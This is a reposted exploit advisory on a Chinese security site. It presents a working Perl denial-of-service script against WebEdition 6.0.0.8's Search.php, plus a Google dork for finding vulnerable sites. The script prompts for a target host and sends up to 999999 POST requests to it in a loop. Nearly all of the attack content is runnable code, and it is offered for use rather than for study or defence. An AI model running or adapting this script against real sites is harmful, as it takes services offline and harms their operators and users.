首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Webedition 6.0.0.8 (Search.php) Denial of Service Vulnerability 来源：H4k3r@live.co.uk 作者：H4k3r 发布时间：2010-08-19   1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          0     _                   __           __       __                     1 1   /' \            __  /'__`\        /\ \__  /'__`\                   0 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1 1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1 1                  \ \____/ >> Exploit database separated by exploit   0 0                   \/___/          type (local, remote, DoS, etc.)    1 1                                                                      0 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1 #[+] Discovered By   : H4k3r #[+] Site            : Inj3ct0r.com #[+] support e-mail  : H4k3r@live.co.uk Product: Webedition Version: 6.0.0.8. Dork : "Powered by Webedition 6.0.0.8." Exploit: ##########Start of P0C########### #!/usr/bin/perl use IO::Socket; print "\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n"; print "+       WebEdition V6.0.0.8 D.O.S Exploit       +\n"; print "+               (C)oded by H4k3r                +\n"; print "+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n\n"; print "Host |without http://www.| "; chomp($host = <STDIN>); print "Path |example. /en or / | "; chomp($pth = <STDIN>); { while($x != 999999) { $postit = "?we_lv_search_content_search=H4k3r+Pwnz0rz+From+Inj3ct0r+Team&we_from_search_content_search=1"; $lrg = length $postit; my $sock = new IO::Socket::INET ( PeerAddr => "$host", PeerPort => "80", Proto => "tcp", ); die "\nOffline! - We can not Connect To '$host' it May be DoSed\n" unless $sock; print $sock "POST $pth/Search.php HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n"; print $sock "Referer: $host\n"; print $sock "Accept-Language: en-us\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "Accept-Encoding: gzip, deflate\n"; print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; print $sock "Connection: Keep-Alive\n"; print $sock "Cache-Control: no-cache\n"; print $sock "Content-Length: $lrg\n\n"; print $sock "$postit\n"; close($sock); syswrite STDOUT, "Online! "; $x++; } } ###########End of P0C###########   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·RockN Wav Editor 1.8 Denial of ·SOMPL Music Player v1.0 (.m3u) ·Open-Realty 2.5.7 Local File D ·Vural Portal 2010 Remote Datab ·Httpdx 1.5.4 Multiple Denial o ·A-PDF WAV to MP3 v1.0.0 Univer ·SonicWALL E-Class SSL-VPN Acti ·VbsEdit v4.6.1.0 Denial of Ser ·FreeBSD mbufs() sendfile Cache ·Tuniac 100723 Denial of Servic ·Fennec 1.2 Beta 3 Denial of Se ·Linux x86 /bin/sh Null-Free Po   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved